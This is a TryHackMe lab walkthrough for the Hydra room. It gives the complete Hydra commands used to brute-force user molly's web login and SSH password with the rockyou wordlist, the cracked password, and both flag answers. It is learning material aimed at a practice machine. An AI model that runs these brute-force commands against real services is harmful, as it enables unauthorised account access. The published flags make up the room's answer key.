This is my TryHackMe walkthrough, created to document my learning journey and share solutions with the community. The writeups include a mix of hints, step-by-step explanations, and final answers to help players who get stuck, while still encouraging independent problem-solving.
Hydra Room - Learn about and use Hydra, a fast network logon cracker, to bruteforce and obtain a website’s credentials.
Overview
- Room URL: https://tryhackme.com/room/hydra
- Difficulty: Easy
- Time to complete: 45
Walkthrough
1. Hydra Introduction
No hints needed!
2. Using Hydra
Use Hydra to bruteforce molly's web password. What is flag 1?
Start the machine and visit the website via MACHINE IP
- Open Web Devtools, in Network section, try login there is a POST request to
http://<MACHINE_IP>/login
- Now we know the path, we can brute-force the password
hydra -l molly -P /usr/share/wordlists/rockyou.txt <MACHINE_IP> http-post-form "/login:username=^USER^&password=^PASS^:F=Incorrect" -V
- We got the password
sunshine, login asmollyand get the flag
=> Answer: THM{2673a7dd116de68e85c48ec0b1f2612e}
Use Hydra to bruteforce molly's SSH password. What is flag 2?
Do the same with ssh to get the password and gain access
hydra -l molly -P /usr/share/wordlists/rockyou.txt <MACHINE_IP> -t 4 ssh
- Now we got the password, ssh to server and get the flag
ssh molly@<MACHINE_IP>
cat flag2.txt
=> Answer: THM{c8eeb0468febbadea859baeb33b2541b}